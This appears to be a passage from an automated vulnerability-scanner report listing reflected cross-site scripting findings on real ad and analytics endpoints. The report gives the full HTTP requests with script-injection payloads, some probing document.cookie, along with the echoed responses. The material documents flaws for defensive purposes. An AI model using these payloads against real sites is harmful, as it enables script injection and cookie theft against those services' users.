Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=69a5d959-2383-46d3-a91e-54766c81e851

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=E90BDFAA65B881BE49A3F4A3B6F17540; Path=/
ETag: "0-gzip"
Cache-Control: must-revalidate, max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 01 Apr 2011 18:11:10 GMT
Connection: close

if(typeof __ADXPOSE_CONTAINERS__==="undefined"){__ADXPOSE_CONTAINERS__={}}if(typeof __ADXPOSE_EVENT_QUEUES__==="undefined"){__ADXPOSE_EVENT_QUEUES__={}}if(typeof __adxpose__getOffset__==="undefined"){
...[SNIP]...
SE_LOG_EVENT__("000_000_3",b,i,"",Math.round(V.left)+","+Math.round(V.top),L+","+F,z,j,k,s,P)}}q=n.inView}}}if(!__ADXPOSE_PREFS__.override){__ADXPOSE_WIDGET_IN_VIEW__("container_ZC45X9Axu6NOUFfX_2896694b45f<script>alert(1)</script>40dfedbedff".replace(/[^\w\d]/g,""),"ZC45X9Axu6NOUFfX_2896694b45f<script>
...[SNIP]...

2.10. http://api.ipinfodb.com/v2/ip_query_country.php [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.ipinfodb.com
Path:   /v2/ip_query_country.php

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload d7a63<script>alert(1)</script>e533171dea4 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v2/ip_query_country.php?key=bff296a072906f8d56628b8f4c453c6189ed3da638db5981b97732bb86d0129a&output=json&timezone=false&callback=visitorGeolocation.setGeoCookied7a63<script>alert(1)</script>e533171dea4 HTTP/1.1
Host: api.ipinfodb.com
Proxy-Connection: keep-alive
Referer: http://www.viagra.com/favicon.ico?92bef'-alert(document.cookie)-'af112dd110f=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 01 Apr 2011 17:31:16 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Content-Length: 176
Content-Type: text/json; charset=UTF-8

visitorGeolocation.setGeoCookied7a63<script>alert(1)</script>e533171dea4(
{
"Ip" : "173.193.214.243",
"Status" : "OK",
"CountryCode" : "US",
"CountryName" : "United States"
}
)

2.11. http://api.ipinfodb.com/v2/ip_query_country.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.ipinfodb.com
Path:   /v2/ip_query_country.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 65179<script>alert(1)</script>2e96d59bfcf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v2/ip_query_country.php?key=bff296a072906f8d56628b8f4c453c6189ed3da638db5981b97732bb86d0129a&output=json&timezone=false&callback=visitorGeolocation.setGeoCo/65179<script>alert(1)</script>2e96d59bfcfokie HTTP/1.1
Host: api.ipinfodb.com
Proxy-Connection: keep-alive
Referer: http://www.viagra.com/favicon.ico?92bef'-alert(document.cookie)-'af112dd110f=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 01 Apr 2011 17:31:18 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Content-Length: 177
Content-Type: text/json; charset=UTF-8

visitorGeolocation.setGeoCo/65179<script>alert(1)</script>2e96d59bfcfokie(
{
"Ip" : "173.193.214.243",
"Status" : "OK",
"CountryCode" : "US",
"CountryName" : "United States"
}
)

2.12. http://b.scorecardresearch.com/beacon.js [c1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload c3faf<script>alert(1)</script>fbf7af21dea was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7c3faf<script>alert(1)</script>fbf7af21dea&c2=5964888&c3=2&c4=&c5=&c6=&c15=&tm=277901 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.aeriagames.com/meebo.html?network=aeriagames&lang=en
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Fri, 08 Apr 2011 18:17:20 GMT
Date: Fri, 01 Apr 2011 18:17:20 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
E.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7c3faf<script>alert(1)</script>fbf7af21dea", c2:"5964888", c3:"2", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



2.13. http://b.scorecardresearch.com/beacon.js [c15 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload 239b5<script>alert(1)</script>62bdd952f2c was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2&c4=&c5=&c6=&c15=239b5<script>alert(1)</script>62bdd952f2c&tm=277901 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.aeriagames.com/meebo.html?network=aeriagames&lang=en
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Fri, 08 Apr 2011 18:17:21 GMT
Date: Fri, 01 Apr 2011 18:17:21 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"", c5:"", c6:"", c10:"", c15:"239b5<script>alert(1)</script>62bdd952f2c", c16:"", r:""});



2.14. http://b.scorecardresearch.com/beacon.js [c2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload b1cdd<script>alert(1)</script>1daad3d2702 was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888b1cdd<script>alert(1)</script>1daad3d2702&c3=2&c4=&c5=&c6=&c15=&tm=277901 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.aeriagames.com/meebo.html?network=aeriagames&lang=en
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Fri, 08 Apr 2011 18:17:21 GMT
Date: Fri, 01 Apr 2011 18:17:21 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
on(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"5964888b1cdd<script>alert(1)</script>1daad3d2702", c3:"2", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



2.15. http://b.scorecardresearch.com/beacon.js [c3 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload c9e4f<script>alert(1)</script>08282fdd351 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2c9e4f<script>alert(1)</script>08282fdd351&c4=&c5=&c6=&c15=&tm=277901 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.aeriagames.com/meebo.html?network=aeriagames&lang=en
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Fri, 08 Apr 2011 18:17:21 GMT
Date: Fri, 01 Apr 2011 18:17:21 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
y{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2c9e4f<script>alert(1)</script>08282fdd351", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



2.16. http://b.scorecardresearch.com/beacon.js [c4 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload ab948<script>alert(1)</script>a35ddd47098 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2&c4=ab948<script>alert(1)</script>a35ddd47098&c5=&c6=&c15=&tm=277901 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.aeriagames.com/meebo.html?network=aeriagames&lang=en
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Fri, 08 Apr 2011 18:17:21 GMT
Date: Fri, 01 Apr 2011 18:17:21 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"ab948<script>alert(1)</script>a35ddd47098", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



2.17. http://b.scorecardresearch.com/beacon.js [c5 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload a8c59<script>alert(1)</script>cf2ea45f930 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2&c4=&c5=a8c59<script>alert(1)</script>cf2ea45f930&c6=&c15=&tm=277901 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.aeriagames.com/meebo.html?network=aeriagames&lang=en
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Fri, 08 Apr 2011 18:17:21 GMT
Date: Fri, 01 Apr 2011 18:17:21 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"", c5:"a8c59<script>alert(1)</script>cf2ea45f930", c6:"", c10:"", c15:"", c16:"", r:""});



2.18. http://b.scorecardresearch.com/beacon.js [c6 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload e1892<script>alert(1)</script>f5ea083f0b1 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2&c4=&c5=&c6=e1892<script>alert(1)</script>f5ea083f0b1&c15=&tm=277901 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.aeriagames.com/meebo.html?network=aeriagames&lang=en
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Fri, 08 Apr 2011 18:17:21 GMT
Date: Fri, 01 Apr 2011 18:17:21 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"", c5:"", c6:"e1892<script>alert(1)</script>f5ea083f0b1", c10:"", c15:"", c16:"", r:""});



2.19. http://event.adxpose.com/event.flow [uid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://event.adxpose.com
Path:   /event.flow

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload a065c<script>alert(1)</script>581d91e7aaa was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /event.flow?eventcode=000_000_12&location=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Fpagead%2Fads%3Fclient%3Dca-pub-8825891582215045%26output%3Dhtml%26h%3D250%26slotname%3D9743825372%26w%3D300%26lmt%3D1301699500%26flash%3D10.2.154%26url%3Dhttp%253A%252F%252Fwww.quickyellow.com%252F%26dt%3D1301681500418%26bpp%3D2%26shv%3Dr20110324%26jsv%3Dr20110321-2%26prev_slotnames%3D8282812667%26correlator%3D1301681500450%26frm%3D0%26adk%3D3051422498%26ga_vid%3D1234146098.1301681501%26ga_sid%3D1301681501%26ga_hid%3D936317177%26ga_fc%3D0%26u_tz%3D-300%26u_his%3D3%26u_java%3D1%26u_h%3D1200%26u_w%3D1920%26u_ah%3D1156%26u_aw%3D1920%26u_cd%3D16%26u_nplug%3D9%26u_nmime%3D44%26biw%3D1118%26bih%3D1004%26fu%3D0%26ifi%3D2%26dtd%3D145%26xpc%3DHEyqJzw6JK%26p%3Dhttp%253A%2F%2Fwww.quickyellow.com&uid=ZC45X9Axu6NOUFfX_289669a065c<script>alert(1)</script>581d91e7aaa&xy=0%2C0&wh=300%2C250&vchannel=69112&cid=166308&cookieenabled=1&screenwh=1920%2C1200&adwh=300%2C250&colordepth=16&flash=10.2&iframed=1 HTTP/1.1
Host: event.adxpose.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-8825891582215045&output=html&h=250&slotname=9743825372&w=300&lmt=1301699500&flash=10.2.154&url=http%3A%2F%2Fwww.quickyellow.com%2F&dt=1301681500418&bpp=2&shv=r20110324&jsv=r20110321-2&prev_slotnames=8282812667&correlator=1301681500450&frm=0&adk=3051422498&ga_vid=1234146098.1301681501&ga_sid=1301681501&ga_hid=936317177&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1118&bih=1004&fu=0&ifi=2&dtd=145&xpc=HEyqJzw6JK&p=http%3A//www.quickyellow.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=69a5d959-2383-46d3-a91e-54766c81e851

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=B3FB1CE06E81EFF05A150AFF904264C8; Path=/
Cache-Control: no-store
Content-Type: text/javascript;charset=UTF-8
Content-Length: 145
Date: Fri, 01 Apr 2011 18:11:16 GMT

if (typeof __ADXPOSE_EVENT_QUEUES__ !== "undefined") __ADXPOSE_DRAIN_QUEUE__("ZC45X9Axu6NOUFfX_289669a065c<script>alert(1)</script>581d91e7aaa");

2.20. http://ib.adnxs.com/ab [cnd parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ab

Issue detail

The value of the cnd request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e4fb3'-alert(1)-'79dc16e5093 was submitted in the cnd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ab?enc=pHA9CtcjI0CkcD0K1yMjQAAAAEAzMwtApHA9CtcjI0CkcD0K1yMjQJhmvdWWfkEfvNv2i6g_Cj43FZZNAAAAAOguAAC1AAAAlgIAAAIAAADHpAIA0WMAAAEAAABVU0QAVVNEACwB-gCkDGUAuQ4BAgUCAAQAAAAAPB_ZjAAAAAA.&tt_code=vert-377&udj=uf%28%27a%27%2C+9797%2C+1301681467%29%3Buf%28%27c%27%2C+47580%2C+1301681467%29%3Buf%28%27r%27%2C+173255%2C+1301681467%29%3Bppv%288991%2C+%272252220474958112408%27%2C+1301681467%2C+1301724667%2C+47580%2C+25553%29%3B&cnd=!TA_hmwjc8wIQx8kKGAAg0ccBKGUxMzMzEdcjI0BCCggAEAAYACABKAFCCwifRhAAGAAgAygBQgsIn0YQABgAIAIoAUgBUABYpBlgAGiWBQ..e4fb3'-alert(1)-'79dc16e5093&referrer=http://www.quickyellow.com/&pp=TZYVNgAPLUAK5TqOQQlfYZle0E2L5OGhqjK3xg&pubclick=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBOd_6NhWWTcDaPI71lAfhvqWIBNfq-NMBl6GU7Bi3zOLcHAAQARgBIAA4AVCAx-HEBGDJBoIBF2NhLXB1Yi04ODI1ODkxNTgyMjE1MDQ1oAHD8v3sA7IBE3d3dy5xdWlja3llbGxvdy5jb226AQozMDB4MjUwX2FzyAEJ2gEbaHR0cDovL3d3dy5xdWlja3llbGxvdy5jb20vmAK6QMACBMgChdLPCqgDAegD-QLoA7kI6APgKugDA_UDAAAAxIAG6cSF9MWQ1oky%26num%3D1%26sig%3DAGiWqtzZABCUPOVkuk1oyP0KbF8tqkl9SQ%26client%3Dca-pub-8825891582215045%26adurl%3D HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-8825891582215045&output=html&h=250&slotname=9743825372&w=300&lmt=1301699500&flash=10.2.154&url=http%3A%2F%2Fwww.quickyellow.com%2F&dt=1301681500418&bpp=2&shv=r20110324&jsv=r20110321-2&prev_slotnames=8282812667&correlator=1301681500450&frm=0&adk=3051422498&ga_vid=1234146098.1301681501&ga_sid=1301681501&ga_hid=936317177&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1118&bih=1004&fu=0&ifi=2&dtd=145&xpc=HEyqJzw6JK&p=http%3A//www.quickyellow.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChEIuCUQChgBIAEoATD4qtPsBBD4qtPsBBgA; sess=1; uuid2=4470455573253905340; anj=Kfw)mCZ#-r-!gzoh^Cqhjkv(+'n*Ar?/j9C?^6hwKS-6T#`5PBojYbRuf<Ll1I1_hYMhYeh%G6vYp*t5ODvAzTZ@iISJjXDc'nh[thoDjVDOn>OkjdhM-]kxuVc<-j^0E[S._]n?/-AkZL.5?T2G#A#U]+VwBupzlO^jt'sib/l$cNheGq(khOe'bw8d`euB.cj?qbq-gA!pj6^1%-h#Y:>8>-aA1s%>+2VKHUo:D4$wXYcPJa0pV6(yoKtkH4iSC7Y0![RCC#S9MDO7fT+LqQ2Bn!Cm+LoEJ1Rj9dTlZBSd-<H%U!v%'=cs)G=s5$$Fuh<-Uuf/c-H3lH#jqd6Oap3Jn<XaPzn`'kW8x490>]R9YwPWP84i@Tft^.$7hboq>5:RM_$2tI+t4y?]Wh$S3mfg$(rmoM+#rsOr%N_18#>u)Ad68T3rF<u@3GoUxqQuHeiMw`Mqgp3o`Lp^?sA:$+jr?'sLsp$GL52tA2rb_L7O9%tUm:mmr=Ma5rfGjl=`EA9k>54kg-mIfrsmD+)e>dAw+wgM1Z6.B++zP/-x-<YUx13AHx9m9EVCQ[0t>Lec_mi9=M5ckg9If?r2d=YvFi3W?kOv*'yK4EBNS-X-8(dO4`JtpvlG@^Em+X<s'_Bt4b*wzi%NN%0Y)2hh5+<oT@8?Dc@POarr%:v7cD'2OHF=bSuBlUCX?Nxf8N^Nh4>i5l%cKbE6+*6BP+`-(g2TYeYWq2wwO<::r`4Y

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sat, 02-Apr-2011 18:11:41 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4470455573253905340; path=/; expires=Thu, 30-Jun-2011 18:11:41 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Set-Cookie: uuid2=4470455573253905340; path=/; expires=Thu, 30-Jun-2011 18:11:41 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)nCZ(]G)J7/O]F%-R2Z:f5>iQ*BYsWzvY8.)nH<$2.XWJWtjGv+4w]%yLG4BGFFn:P$AZ#Gz+-$TeEYm*.e'pf613v0MVm*_^3DJ=UIpYC@cXq-NpFHIkuVc<N=z-FiJ>g#l^L=JY]hp-mYdSLPGRC`g81EObM7iN.f%puar10yPY-[7]F9>i(B_A3PcZVmL-3uUR<*D:Qns%he1n7(1ZkiLgKp9q?U5$Ij`[VKooNc(D*%gjgqY9:!2[S.8mFdR^`1sGPsjV%G.tZzP+pC7Us+-Gmo'gHOO9VN]#I#>z$1O.0n0]FCI)%$irNtLYKGrLFm?FDH?kJHg+BL8j#t/3=LC`!k_10x0APpn$po_.%Qrn5LKaG+C:>+KYM0vexr#o3CPNpSS3kDk`leH`z(>e$g8?BhTnnjEm8JQCKDrol@l(u:QKVyn#'yiFkQ%d_+5c9>HA[f#/bkaeo7jYo1ntF*U'L(DV:gm_r3?R0pK7!>Tv<m$?W3RCIi/.ivIuiY(k1nU(`.z8Dj+=knZI=n]L=W?OG7<xts(:v/JJN_J+xBHp18UKoBo/f9tnWq6lZ`#sAsO(QR'fx#CerhiCJA+y5zwFJ5#.8wD((3pHou4zn%-.N6!/.qkDJsjN/f->S93^CKwybouKV%kLp#)1q.ZX-E+g*^mmMS.NzjYWVBukjw`z_T5).wO]n@%1hYVo>bCP78jEMPvt4wzX^D(M%?3m#wp)VawZvyQv7l4F6_lnT=.2<-wStTMc; path=/; expires=Thu, 30-Jun-2011 18:11:41 GMT; domain=.adnxs.com; HttpOnly
Date: Fri, 01 Apr 2011 18:11:41 GMT
Content-Length: 1458

document.write('<scr' + 'ipt language=\"Javascript\"><!--\n amgdgt_p=\"5112\";\n amgdgt_pl=\"bad56300\"; \n amgdgt_t = \"i\";\n amgdgt_clkurl = \"http://ib.adnxs.com/click/AAAAAACAIEAAAAAAAIAgQAAA
...[SNIP]...
